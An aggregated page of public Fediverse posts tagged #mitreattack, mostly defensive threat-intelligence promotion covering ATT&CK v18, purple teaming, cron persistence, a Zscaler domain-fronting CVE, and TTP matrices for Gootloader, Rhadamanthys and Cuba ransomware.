home.social
Sign in Create account

#mitreattack — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #mitreattack, aggregated by home.social.

  1. OSTechNix @[email protected] ·

    Learn How Malware Survives Reboots and Cleanup Using Cron Persistence Technique in Linux Systems.

    Full Details Here: ostechnix.com/cron-persistence

    #CronPersistence #Malware #Cronjob #Cron #LinuxSecurity #MitreAttack #Linux

    #cronpersistence #malware #cronjob #cron #linuxsecurity #mitreattack
  2. The DefendOps Diaries @[email protected] ·

    Red and blue teams breaking down their silos and working in real time—imagine a cybersecurity defense that evolves with every simulated threat. Curious how continuous purple teaming is rewriting the playbook?

    thedefendopsdiaries.com/contin

    #purpleteaming
    #cyberdefense
    #breachandattacksimulation
    #mitreattack
    #redteam
    #blueteam
    #securityautomation
    #continuousvalidation
    #cybersecuritystrategy

    #purpleteaming #cyberdefense #breachandattacksimulation #mitreattack #redteam #blueteam
  3. The DefendOps Diaries @[email protected] ·

    Red and blue teams breaking down their silos and working in real time—imagine a cybersecurity defense that evolves with every simulated threat. Curious how continuous purple teaming is rewriting the playbook?

    thedefendopsdiaries.com/contin

    #purpleteaming
    #cyberdefense
    #breachandattacksimulation
    #mitreattack
    #redteam
    #blueteam
    #securityautomation
    #continuousvalidation
    #cybersecuritystrategy

    #purpleteaming #cyberdefense #breachandattacksimulation #mitreattack #redteam #blueteam
  4. The DefendOps Diaries @[email protected] ·

    Red and blue teams breaking down their silos and working in real time—imagine a cybersecurity defense that evolves with every simulated threat. Curious how continuous purple teaming is rewriting the playbook?

    thedefendopsdiaries.com/contin

    #purpleteaming
    #cyberdefense
    #breachandattacksimulation
    #mitreattack
    #redteam
    #blueteam
    #securityautomation
    #continuousvalidation
    #cybersecuritystrategy

    #cybersecuritystrategy #continuousvalidation #securityautomation #blueteam #redteam #mitreattack
  5. The DefendOps Diaries @[email protected] ·

    Red and blue teams breaking down their silos and working in real time—imagine a cybersecurity defense that evolves with every simulated threat. Curious how continuous purple teaming is rewriting the playbook?

    thedefendopsdiaries.com/contin

    #purpleteaming
    #cyberdefense
    #breachandattacksimulation
    #mitreattack
    #redteam
    #blueteam
    #securityautomation
    #continuousvalidation
    #cybersecuritystrategy

    #purpleteaming #cyberdefense #breachandattacksimulation #mitreattack #redteam #blueteam
  6. TechNadu @[email protected] ·

    🚀 MITRE ATT&CK v18 = a major leap in detection depth.

    The new version adds Detection Strategies and Analytics - helping defenders align detection logic to platform-specific threats.

    Also new: CI/CD, Kubernetes, ransomware prep behaviors, mobile “linked devices” exploits, and ICS asset updates.

    MITRE even launched the ATT&CK Advisory Council to strengthen community collaboration.

    💬 What part of ATT&CK v18 do you think will have the biggest impact on detection engineering?
    Follow @technadu for more #ThreatIntel insights.

    #CyberSecurity #MITREATTACK #DetectionEngineering #CTI #ThreatIntel #BlueTeam #Infosec #CyberDefense #MITRE #ICS #CloudSecurity #MobileSecurity

    #threatintel #cybersecurity #mitreattack #detectionengineering #cti #blueteam
  7. Claudius Link @[email protected] ·

    I'm just working on a #ThreatModeling workshop with #EoP and I just wondered, is there an equivalent of Threat Modeling for IT? You could use #MitreAttack for something similar but I'm missing the cooperative teamwork of EoP
    #CyberSecurity

    Do you know about a similar technic, methodology, ... with a focus on IT? Please let me know what you use

    #threatmodeling #eop #mitreattack #cybersecurity
  8. Claudius Link @[email protected] ·

    I'm just working on a #ThreatModeling workshop with #EoP and I just wondered, is there an equivalent of Threat Modeling for IT? You could use #MitreAttack for something similar but I'm missing the cooperative teamwork of EoP
    #CyberSecurity

    #threatmodeling #eop #mitreattack #cybersecurity
  9. Tedi Heriyanto @[email protected] ·

    SIEM 4.0: The Essentialist Evolution: jacknaglieri.substack.com/p/ge

    What to expect in SIEM 4.0:

    - Prioritizing impactful MITRE tactics rather than complete ATT&CK coverage.

    - Shifting from atomics to risk-based alerts that analyze groups of actions.

    - Opening up the data lake and introducing new criteria for open data platforms.

    - Controlling low-quality alerts through the adoption of “as code” principles.

    - Using AI to automate routine tasks allows humans to focus on high-value work.

    #siem #mitreattack #riskbased #DetectionAsCode

    #siem #mitreattack #riskbased #detectionascode
  10. Not Simon @[email protected] ·

    Trend Micro reports on a new China-nexus cyberespionage group (dubbed Earth Krahang) that primarily targets Southeast Asia and then Europe, America, and Africa. It has multiple connections to another Chinese APT Earth Lusca (aka Aquatic Panda, Bronze University, Charcoal Typhoon, RedHotel) and potential links to i-SOON. Trend Micro was able to retrieve multiple files from Earth Krahang’s servers, including samples, configuration files, and log files from its attack tools. MITRE ATT&CK TTPs and IOC provided. 🔗 trendmicro.com/en_us/research/

    #EarthKrahang #cyberespionage #EarthLusca #AquaticPanda #CharcoalTyphoon #RedHotel #China #APT #IOC #threatintel #MITREATTACK

    #earthkrahang #cyberespionage #earthlusca #aquaticpanda #charcoaltyphoon #redhotel
  11. Just Another Blue Teamer @[email protected] ·

    📢 Attention, threat hunters! We're thrilled to present an exclusive training session at #BlackHatAsia2024 titled "Beyond IOCs: How to Effectively Threat Hunt Using TTPs and Behaviors," a virtual masterclass led by Lee Archinal from Cyborg Security. Don't miss this opportunity—grab the early-bird pricing before March 1, 2024!

    🔗 Secure your spot at the early-bird rate by registering before March 1:
    lnkd.in/g2Wh3Pyg

    #cybersecuritytraining #threatdetection #blackhatasia #TTPsNotIOCs #behavioralthreathunting #securityoperations #cybersecurityprofessionals #mitreattack #cybersecurity #cybersecurityskills #threathunting

    #blackhatasia2024 #cybersecuritytraining #threatdetection #blackhatasia #ttpsnotiocs #behavioralthreathunting
  12. 🛡 [email protected]/:~# :blinking_cursor:​ @[email protected] ·

    "🚨 CVE-2023-28807 - Domain Fronting Evasion in ZIA 🚨"

    An evasion technique identified as CVE-2023-28807, allows attackers to bypass Zscaler Internet Access (ZIA)'s domain fronting detection by exploiting a mismatch between Connect Host and Server Name Indication (SNI) in Client Hello messages. The vulnerability exploits how ZIA handles the SNI field during the TLS handshake process. The SNI is intended to indicate which host the client wants to connect to within a shared hosting environment, allowing the server to present the correct certificate for that host. However, due to this vulnerability, an attacker can manipulate the SNI in such a way that the security mechanisms fail to correctly identify and filter malicious traffic, enabling the attacker to hide malicious activities within what appears to be legitimate traffic.
    This vulnerability, discovered and addressed by Zscaler. Users are urged to upgrade to version 6.2r.290 to mitigate this risk. 🛡️💻🔐

    Source: Zscaler & VulDB

    Tags: #Cybersecurity #CVE2023 #DomainFronting #Zscaler #NetworkSecurity #EvasionTechniques #MITREATTACK MITRE - T1587.003 🌍🔒🔍

    #cybersecurity #cve2023 #domainfronting #zscaler #networksecurity #evasiontechniques
  13. TropChaud @[email protected] ·

    This morning, we're thrilled to publish the @tidalcyber Ultimate Guide to Cyber Threat Profiling. At 57 pages of workflows, tips, resources, and infographics, I’m out of many more words to add here – check it out and let us know what you think!

    #threatprofile #threatinformeddefense #mitreattack #DiamondModel #TTP #APT #ransomware #risk #cyber

    tidalcyber.com/ultimate-guide-

    #threatprofile #threatinformeddefense #mitreattack #diamondmodel #ttp #apt
  14. TropChaud @[email protected] ·

    Introducing the newest major @tidalcyber TTP intelligence content roundup, the Initial Access & Malware Delivery Landscape matrix, now live in our free Community Edition platform: app.tidalcyber.com/share/43836

    The matrix covers 25 major & emerging #malware typically used to gain early footholds in victim environments, often leading to ingress of more impactful threats, especially #ransomware, #infostealers, cryptominers, & more. It includes many recognizable names (#QakBot, #IcedID, #Emotet, #Bumblebee, #Gootloader) plus several newer and less-discussed threats

    The matrix includes 13 custom Technique Sets for threats not currently tracked in the #mitreattack knowledge base. All technique references derive from a large volume of recent, public #threat reporting (click the labels in the ribbon at the top of the matrix to view relevant source URLs for each threat)

    An interactive link analysis visualization of connections among these threats, also derived from public reports, is also available here: onodo.org/visualizations/23506

    Community Edition matrices support easy identification of shared (and outlier) techniques among multiple threats, and quick & easy overlay or pivoting to defensive & offensive security capabilities relevant to your own #security stack. We’ll have a blog out soon reviewing our analysis of top & trending techniques common among these initial access threats

    Tidal’s #Adversary Intelligence team remains focused on providing up-to-date #TTPintelligence, especially around traditionally under-represented yet widely relevant threats like crimeware. Other popular matrices in this theme include our Ransomware & Data Extortion Landscape matrix (app.tidalcyber.com/share/9a0fd) and Major & Emerging Infostealers matrix (app.tidalcyber.com/share/ec62f), which each cover 20+ threats

    Financially motivated adversaries often display a rapid pace of #TTP evolution, and this is especially apparent for #initialaccess threats. Register for our webinar on May 31 dedicated to TTP evolution, its drivers, and discussion around what defenders can do to address it and its implications: hubs.la/Q01NC23k0

    #SharedWithTidal #threatinformeddefense #malware #infostealer #cryptominer #IAB #blueteam #detectionengineering #purpleteam #cyber

    #malware #ransomware #infostealers #qakbot #icedid #emotet
  15. TropChaud @[email protected] ·

    #Gootloader is a highly active banking Trojan-turned-loader #malware that has recently appeared on multiple vendors’ priority threat lists, attacking organizations in a wide range of verticals & countries. If your leadership or other stakeholders asked for a list of this threat's most common TTPs, would you be able to provide it quickly?

    Now you can, with the Gootloader #TTP matrix available in Tidal’s free Community Edition: app.tidalcyber.com/share/796ca

    Gootloader, also referred to by its related payload, #Gootkit, first emerged in 2014 but has been especially active since 2020. Despite this, technical reporting around its TTPs has been relatively light until even more recently. In the past two years alone, verticals including finance, #healthcare, defense, pharmaceutical, energy, & automotive have faced Gootloader campaigns, with victims across North America, Western Europe, & South Korea, and the malware is regularly used to deliver high-impact payloads, including Cobalt Strike, #IcedID (a common #ransomware precursor), & more. Industry-based #threat profiling can be a powerful tool, but even if your industry (or your corner of it) hasn’t yet directly observed Gootloader activity, we believe broad-based threats like this should be on most teams’ radars

    Our matrix summarizes Gootloader TTPs detailed across several great recent technical reports. Reports from SentinelLabs, Cybereason, & The DFIR Report were helpfully pre-mapped to #mitreattack, and we mapped a couple other detailed analyses. Procedural details are even available for nearly all the included technique mappings – be sure to click the Technique Set’s label in the ribbon at the top of the screen to pivot into the Details page with this information & relevant source links throughout

    Red Canary & The DFIR Report helpfully provided tool-agnostic suggested #detection logic for key behaviors observed during recent Gootloader campaigns here redcanary.com/blog/gootloader/ and here thedfirreport.com/2022/05/09/s. Take a wider view by layering entire segments of your defensive stack over the #CTI back in the Community Edition, by toggling on any of the mappings available in @tidalcyber's Product Registry app.tidalcyber.com/vendors

    #SharedWithTidal #threatinformeddefense #CobaltStrike #initialaccess #blueteam

    #detection #cti #sharedwithtidal #threatinformeddefense #cobaltstrike #initialaccess
  16. TropChaud @[email protected] ·

    #Rhadamanthys #stealer seems to be having a moment right now. Quick rundown on what we know about infection trends & its post-exploit TTPs

    Discovered last summer, it's one of several popular & emerging #infostealer #malware with new/improved evasion and/or theft capabilities observed in recent months. Like many popular families, Rhadamanthys initial infections occur via multiple vectors, including #phishing & #spam email attachments and - increasingly - legitimate web search ads: malware-traffic-analysis.net/2, blog.cyble.com/2023/01/12/rhad

    In our broad analysis of the infostealer threat landscape, we identified #mitreattack TTPs associated with 16 families across dozens of public reports. We've already added more reported techniques to Rhadamanthys' set since the report dropped this week tidalcyber.com/blog/big-game-s

    Still somewhat limited public reporting on this threat to date, although we've identified 22 (sub-)techniques associated with Rhadamanthys so far. Visualize them and pivot to associated defensive & offensive testing capabilities here: app.tidalcyber.com/share/techn

    In addition to the reports above, two other resources here: accenture.com/us-en/blogs/secu, threatmon.io/rhadamanthys-stea. Thanks to the teams that published great reporting & analysis around Rhadamanthys so far, including ThreatMon Accenture @malware_traffic & Cyble

    #threatinformeddefense #credentials #cookies #mfa #2fa

    #rhadamanthys #stealer #infostealer #malware #phishing #spam
  17. TropChaud @[email protected] ·

    ⚠️ Cuba Ransomware resources drop ⚠️

    A new ransomware advisory comes in hot to one of your intelligence channels – what are your next steps? In our latest video, we walk through our approach to a situation like this, which analysts face almost every day amid growing volumes of CTI shared in the community today youtube.com/watch?v=K1a6Mac1-y

    Link to the latest @CISA @FBI #StopRansomware alert on Cuba Ransomware, published Dec 1 (and updated just yesterday) cisa.gov/uscert/ncas/alerts/aa

    Past advisories on five other #ransomware highly active in targeting U.S. critical infrastructure – and many other – organizations just this year: cisa.gov/stopransomware/stopra

    According to the alert, “Since spring 2022, Cuba ransomware actors have modified their TTPs and tools to interact with compromised networks and extort payments from victims.” We’re likely to see more of this “TTP evolution” theme in 2023. As adversaries continue to evolve their TTPs rapidly and often, we had the chance to write more about this trend on our blog recently: tidalcyber.com/blog/adversary-

    (And here’s another piece covering TTP evolution relative to another top malware, QakBot tidalcyber.com/blog/identifyin)

    In the walkthrough, we highlight metrics around threats made on ransomware “extortion blogs” as just one public data point around Cuba’s growing threat in recent months. The figures come from this incredible public dataset github.com/joshhighet/ransomwa

    The rest of the walkthrough centers on our free Community Edition tool. Jump into it here: app.tidalcyber.com/. No registration is required to access a ton of features (including everything shared below) but you know the drill: you’ll ultimately find the most value with a quick email sign-up 📋

    #Cuba Ransomware details from #mitreattack app.tidalcyber.com/software/09

    Technique set for Cuba TTPs published in February app.tidalcyber.com/share/6fbf9 (source: mandiant.com/resources/blog/un)

    Cuba technique set based on CISA’s/FBI’s new alert: app.tidalcyber.com/share/11c63

    Script to quickly convert techniques & procedures from recent #CTI into a technique “layer” json file: github.com/mitre-attack/attack

    LSASS Memory technique details page, with pivots to aligned defensive capabilities, detection analytics, & tests: app.tidalcyber.com/technique/a

    Cuba Ransomware report referencing LSASS Memory & Disable or Modify Tools techniques: unit42.paloaltonetworks.com/cu

    Disable or Modify Tools technique details page: app.tidalcyber.com/technique/9

    Final Cuba Ransomware technique time series comparison/overlay: app.tidalcyber.com/share/7631b

    Dashboard we’re maintaining covering all TTPs from the #StopRansomware alert series, currently spotlighting six high-priority ransomware and updated each time CISA publishes a new alert: app.tidalcyber.com/share/9c1f0

    Join the Tidal Community Slack channel to engage with & learn from others throughout the #threatinformeddefense space join.slack.com/t/tidalcommunit

    Catch this and other walkthroughs on the @tidal Cyber YouTube channel youtube.com/@tidalcyber6071

    #cyberthreatintelligence #cybersecurity #OSINT #SharedWithTidal

    #stopransomware #ransomware #cuba #mitreattack #cti #threatinformeddefense